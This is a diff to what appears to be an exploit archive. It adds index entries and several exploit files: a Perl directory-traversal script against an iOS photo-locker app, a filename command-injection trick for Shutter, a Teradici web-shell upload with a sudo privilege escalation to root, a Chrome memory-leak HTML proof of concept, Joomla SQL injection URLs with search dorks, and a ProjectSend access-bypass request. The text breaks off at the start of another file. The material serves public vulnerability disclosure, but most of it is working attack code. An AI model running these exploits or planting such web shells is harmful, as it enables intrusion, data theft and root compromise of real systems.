diff --git a/files.csv b/files.csv
index 6ad985f3f..f585a64e1 100644
--- a/files.csv
+++ b/files.csv
@@ -5379,6 +5379,9 @@ id,file,description,date,author,platform,type,port
 41421,platforms/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos,0
 41422,platforms/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos,0
 41423,platforms/multiple/dos/41423.txt,"Adobe Flash - YUVPlane Decoding Heap Overflow",2017-02-21,"Google Security Research",multiple,dos,0
+41425,platforms/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos,0
+41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
+41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8813,6 +8816,7 @@ id,file,description,date,author,platform,type,port
 41321,platforms/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,windows,local,0
 41349,platforms/windows/local/41349.py,"ShadeYouVPN Client 2.0.1.11 - Privilege Escalation",2017-02-14,"Kacper Szurek",windows,local,0
 41356,platforms/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local,0
+41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15279,7 +15283,7 @@ id,file,description,date,author,platform,type,port
 41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
 41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0
 41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
-41146,platforms/windows/remote/41146.rb,"DiskSavvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
+41146,platforms/windows/remote/41146.rb,"Disk Savvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
 41148,platforms/windows/remote/41148.html,"Cisco WebEx - 'nativeMessaging' Arbitrary Remote Command Execution",2017-01-24,"Google Security Research",windows,remote,0
 41151,platforms/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)",2017-01-24,Metasploit,windows,remote,0
 41153,platforms/windows/remote/41153.rb,"Geutebrueck GCore 1.3.8.42/1.4.2.37 - Remote Code Execution (Metasploit)",2017-01-24,"Maurice Popp",windows,remote,0
@@ -15291,6 +15295,7 @@ id,file,description,date,author,platform,type,port
 41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
 41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
+41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37341,3 +37346,11 @@ id,file,description,date,author,platform,type,port
 41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0
 41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0
 41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
+41427,platforms/php/webapps/41427.txt,"Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
+41428,platforms/php/webapps/41428.txt,"Joomla! Component VehicleManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
+41429,platforms/php/webapps/41429.txt,"Joomla! Component RealEstateManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
+41430,platforms/php/webapps/41430.txt,"Joomla! Component BookLibrary 3.6.1 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
+41431,platforms/php/webapps/41431.txt,"Joomla! Component MediaLibrary Basic 3.5 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
+41432,platforms/ios/webapps/41432.txt,"Lock Photos Album&Videos Safe 4.3 - Directory Traversal",2017-02-21,Vulnerability-Lab,ios,webapps,0
+41433,platforms/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,php,webapps,0
+41437,platforms/linux/webapps/41437.txt,"Teradici Management Console 2.2.0 - Privilege Escalation",2017-02-22,hantwister,linux,webapps,0
diff --git a/platforms/ios/webapps/41432.txt b/platforms/ios/webapps/41432.txt
new file mode 100755
index 000000000..a5e4eb997
--- /dev/null
+++ b/platforms/ios/webapps/41432.txt
@@ -0,0 +1,205 @@
+Document Title:
+===============
+Lock Photos Album&Videos Safe v4.3 - Directory Traversal Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2032
+
+
+Release Date:
+=============
+2017-02-21
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2032
+
+
+Common Vulnerability Scoring System:
+====================================
+7.8
+
+
+Product & Service Introduction:
+===============================
+You can lock and manage your private photos, videos, text messages, voice recordings, notes, documents and other files very easily! You can store 
+and view PDF, Text(can be created and edited), PowerPoint, Word, Excel, Html, Pages, Key, Numbers and play music very simply! You can as well do 
+more things in one app and manage your life better!
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/lock-photos-album-video.s/id448033053 )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a remote directory traversal vulnerability in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-02-21: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Galaxy Studio (Mo Wellin)
+Product: Lock Photos Album & Videos Safe - iOS Mobile (Web-Application) 4.3
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A directory traversal vulnerability has been dsicovered in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
+The security vulnerability allows an attackers to unauthorized request and download local application files by usage of manipulated path parameters.
+
+The directory traversal web vulnerability is located in the `PRE` parameter of the wifi web-server interface. Remote attackers are able to request 
+the local web-server during the sharing process to access unauthenticated application files. Attackers are able to request via form action path 
+variables to access, download or upload arbitrary files. Remote attackers are able to access the sql-lite database file that own the web-server 
+access credentials of the application. After the download the attacker is able to access the database management system file to use the credentials 
+for unauthorized access via protocol. The PRE request with the action form variable allows to inject any path of the local file system without check 
+for privileges or user access rights. Thus allows an attacker to bypass the local path restriction to compromise the mobile ios web-server application.
+The request method to inject is GET and the attack vector is located on the client-side of the web-server web-application. Finally an attacker is able 
+to access with the credentials the service by using a client via http protocol.
+
+The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8. 
+Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the 
+vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] PRE
+
+Vulnerable Parameter(s):
+[+] form action
+
+Affected Module(s):
+[+] Web-Server File System
+
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Standard Request:
+http://localhost:5555/?PRE=action form
+
+
+PoC: Payload
+//..//..//..//..//..//..//..//..//%00
+/../../../../../../../../%00
+
+
+PoC: Exploitation
+http://localhost:5555/?PRE=action form=/../../../../../../../../%00
+
+
+PoC: Exploit
+use strict;
+use LWP::UserAgent;
+my $b = LWP::UserAgent->new();
+my $host = "localhost:5555";
+print $b->get("http://".$host."/?PRE=action form=/../../../../../../../../%00")->content;
+
+
+--- PoC Session Logs [GET] ---
+Status: 200[OK]
+GET http://localhost:5555/?PRE=action%20form=//..//..//..//..//..//..//..//..//%00 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:5555]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Connection[keep-alive]
+      Upgrade-Insecure-Requests[1]
+   Response Header:
+      Date[Di., 21 Feb. 2017 09:21:48 GMT]
+      Accept-Ranges[bytes]
+      Content-Length[0]
+
+
+
+
+PoC: Vulnerable Source
+{
+  "paths" : [
+    "/Picture/Public/path/All Image/"
+  ],
+  "folder" : "/Picture/Public/path",
+  "code" : 1
+}
+... manipulated
+
+{
+  "paths" : [
+  ],
+  "folder" : "/../../../../../../../../%00",
+  "code" : 1
+}
+
+
+Reference(s):
+http://localhost:5555/
+http://localhost:5555/?PRE
+
+
+Solution - Fix & Patch:
+=======================
+The security vulnerability can be resolved by disallowing users to access the upper path for root privileges. Ensure that the form 
+action request denies to access web-server data or application configuration files. Parse and restrict the form action parameter to 
+prevent further directory traversal attacks.
+
+
+Security Risk:
+==============
+The security risk of the directory traversal web vulnerability in the mobile web-server application is estimated as high. (CVSS 7.8)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
+Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
+Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
+
+				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
diff --git a/platforms/linux/local/41435.txt b/platforms/linux/local/41435.txt
new file mode 100755
index 000000000..bb18d0f3b
--- /dev/null
+++ b/platforms/linux/local/41435.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Shutter user-assisted remote code execution
+# Date: 2016-12-26
+# Software Link: http://shutter-project.org/
+# Version: 0.93.1
+# Tested on: Ubuntu,  Debian
+# Exploit Author: Prajith P
+# Website: http://prajith.in/
+# Author Mail: me@prajith.in
+# CVE: CVE-2016-10081
+
+1. Description.
+   /usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote
+attackers to execute arbitrary commands via a crafted image name that is
+mishandled during a "Run a plugin" action.
+
+2. Proof of concept.
+   1) Rename an image to something like "$(firefox)"
+   2) Open the renamed file in shutter
+   3) Click the "Run a plugin" option and select any plugin from the list and click "Run"
+
+3. Solution:
+  https://bugs.launchpad.net/shutter/+bug/1652600
+
+
+Thanks,
+Prajithh
diff --git a/platforms/linux/webapps/41437.txt b/platforms/linux/webapps/41437.txt
new file mode 100755
index 000000000..f5944f271
--- /dev/null
+++ b/platforms/linux/webapps/41437.txt
@@ -0,0 +1,66 @@
+# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation
+# Date: February 22nd, 2017
+# Exploit Author: hantwister
+# Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console
+# Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)
+# Version: 2.2.0
+
+
+Users that can access the Settings > Database Management page can achieve code
+execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64)
+
+
+Web Shell Upload Vulnerability Overview
+---------------------------------------
+
+Database archives are extracted under /opt/jetty/tmpdeploy. By creating a
+malicious archive with a malicious web script that extracts to the known
+directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any-
+it is possible to add or modify class files and XML files pertaining to the
+application.
+
+
+Privilege Escalation Vulnerability Overview
+-------------------------------------------
+
+The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user
+has sudo rights to run that file without a password. By manipulating this file,
+arbitrary code can be run as root.
+
+
+Exploiting The Vulnerabilities
+------------------------------
+
+alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
+alice:~$ cd runasroot
+alice:~/runasroot$ msfvenom (snip) > evil
+alice:~/runasroot$ chmod a+x evil
+alice:~/runasroot$ nano modify_self_restart.sh
+
+#!/bin/bash
+echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh
+
+alice:~/runasroot$ chmod a+x modify_self_restart.sh
+alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
+alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp
+
+<html>
+<head>
+<title>runasroot</title>
+</head>
+<body>
+<pre>
+<% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %>
+<% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %>
+<% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %>
+</pre>
+</body>
+</html>
+
+alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../..
+alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any-
+alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p
+
+Now, choose to upload runasroot.archive through the Database Management page. An
+error will be displayed that it wasn't a valid archive. Now, navigate to
+https://IP/console/images/runasroot.gsp
\ No newline at end of file
diff --git a/platforms/multiple/dos/41434.html b/platforms/multiple/dos/41434.html
new file mode 100755
index 000000000..0041455a6
--- /dev/null
+++ b/platforms/multiple/dos/41434.html
@@ -0,0 +1,29 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024
+
+Chrome bug:
+
+https://bugs.chromium.org/p/chromium/issues/detail?id=671328
+
+PoC:
+-->
+
+<style>
+content { contain: size layout; }
+</style>
+<script>
+function leak() {
+ document.execCommand("selectAll"); 
+ opt.text = ""; 
+}
+</script>
+<body onload=leak()>
+<content>
+<select>
+<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
+</select>
+</content>
+
+<!--
+Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.
+-->
\ No newline at end of file
diff --git a/platforms/php/webapps/41427.txt b/platforms/php/webapps/41427.txt
new file mode 100755
index 000000000..81f688272
--- /dev/null
+++ b/platforms/php/webapps/41427.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component ContentMap v1.3.8 - SQL Injection
+# Google Dork: inurl:index.php?option=com_contentmap
+# Date: 22.02.2017
+# Vendor Homepage: https://www.turismo.eu/
+# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/geotagging/contentmap/
+# Demo: https://www.turismo.eu/itinerari.html
+# Version: 1.3.8
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_contentmap&owner=plugin&view=smartloader&id=10135&Itemid=606&type=json&filename=articlesmarkers&source=article&contentid=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41428.txt b/platforms/php/webapps/41428.txt
new file mode 100755
index 000000000..81394434b
--- /dev/null
+++ b/platforms/php/webapps/41428.txt
@@ -0,0 +1,22 @@
+# # # # # 
+# Exploit Title: Joomla! Component VehicleManager v3.9 - SQL Injection
+# Google Dork: inurl:index.php?option=com_vehiclemanager
+# Date: 22.02.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/vehiclemanager-basic/
+# Demo: http://ordasvit.com/joomla-vehicle-manager/
+# Version: 3.9
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=[SQL]
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=[SQL]
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=[SQL]
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=[SQL]
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=[SQL]
+# http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41429.txt b/platforms/php/webapps/41429.txt
new file mode 100755
index 000000000..6705d296e
--- /dev/null
+++ b/platforms/php/webapps/41429.txt
@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component RealEstateManager v3.9 - SQL Injection
+# Google Dork: inurl:index.php?option=com_realestatemanager
+# Date: 22.02.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/realestatemanager-basic/
+# Demo: http://ordasvit.com/joomla-real-estate-manager/
+# Version: 3.9
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=all&listing_status=[SQL]
+# http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41430.txt b/platforms/php/webapps/41430.txt
new file mode 100755
index 000000000..999291a00
--- /dev/null
+++ b/platforms/php/webapps/41430.txt
@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component BookLibrary v3.6.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_booklibrary
+# Date: 22.02.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/booklibrary-basic/
+# Demo: http://ordasvit.com/joomla-book-library
+# Version: 3.6.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_booklibrary&task=suggestion&comment=[SQL]
+# http://localhost/[PATH]/index.php/component/booklibrary/0/search?searchtext=[SQL]&author=on&title=on&isbn=on'&bookid=on&description=on&publisher=on&pricefrom=19&priceto=287.9&catid=0&option=com_booklibrary&task=search&Itemid=207
+# # # # #
diff --git a/platforms/php/webapps/41431.txt b/platforms/php/webapps/41431.txt
new file mode 100755
index 000000000..8ec856478
--- /dev/null
+++ b/platforms/php/webapps/41431.txt
@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component MediaLibrary Basic v3.5 - SQL Injection
+# Google Dork: inurl:index.php?option=com_booklibrary
+# Date: 22.02.2017
+# Vendor Homepage: http://ordasoft.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
+# Demo: http://ordasvit.com/joomla-media-library/
+# Version: 3.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/view/book/19[SQL]/Ihsan_Sencan
+# http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/lend_request?mid[0]=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41433.txt b/platforms/php/webapps/41433.txt
new file mode 100755
index 000000000..67bec8174
--- /dev/null
+++ b/platforms/php/webapps/41433.txt
@@ -0,0 +1,157 @@
+Document Title:
+===============
+ProjectSend r754 - IDOR & Authentication Bypass Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2031
+
+
+Release Date:
+=============
+2017-02-21
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2031
+
+
+Common Vulnerability Scoring System:
+====================================
+5.3
+
+
+Product & Service Introduction:
+===============================
+ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that lets 
+you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more depending 
+on external services or e-mail to send those files.
+
+(Copy of the Homepage: http://www.projectsend.org/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a idor and authentication bypass vulnerability in the ProjectSend-r754 web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-02-20: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+GNU GPL License
+Product: ProjectSend r754
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+An insecure direct object references occured in case of an application provides direct access to objects based on user-supplied input. 
+As a result of this vulnerability attackers can bypass authorization and to access resources in the system. Insecure Direct Object References 
+allows attackers to bypass authorization and access resources directly by modifying the value of a parameter[client] used. Thus finally point 
+to other client account names, which allows an attackers to download others clients private data with no secure method provided.
+
+Vulnerability Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] process.php?do=zip_download
+
+Vulnerable Parameter(s):
+[+] client
+[+] file
+
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+1. User "A" as attacker checks a file to download as zip extension, then click download to modifiy values as required ...
+
+2. Application responds with the client file list, so then you are able to download all other side user B data files with zip extension  
+
+--- PoC Session Logs ---
+GET /ProjectSend-r754/process.php?do=zip_download&client=[CLIENTNAME]&files%5B%5D=2 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost/ProjectSend-r754/my_files/
+Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47
+Connection: keep-alive
+-
+HTTP/1.1 200 OK
+Date: Sun, 05 Feb 2017 19:07:41 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.44-0+deb7u1
+Expires: Sat, 26 Jul 1997 05:00:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, max-age=0
+Pragma: no-cache
+Vary: Accept-Encoding
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html
+Content-Length: 6
+
+Name of Files: .jpg
+
+
+Video PoC:
+https://www.youtube.com/watch?v=Xc6Jg9I7Pj4
+
+
+Security Risk:
+==============
+The security risk of the web vulnerability in the ProjectSend-r754 web-application function is estimated as medium. (CVSS 5.3)
+
+
+Credits & Authors:
+==================
+Lawrence Amer - Vulnerability Laboratory [Research Team] - (http://lawrenceamer.me) (https://www.vulnerability-lab.com/show.php?user=Lawrence Amer)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
+Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
+Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
+
+				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
diff --git a/platforms/windows/dos/41425.txt b/platforms/windows/dos/41425.txt
new file mode 100755
index 000000000..de864e87c
--- /dev/null
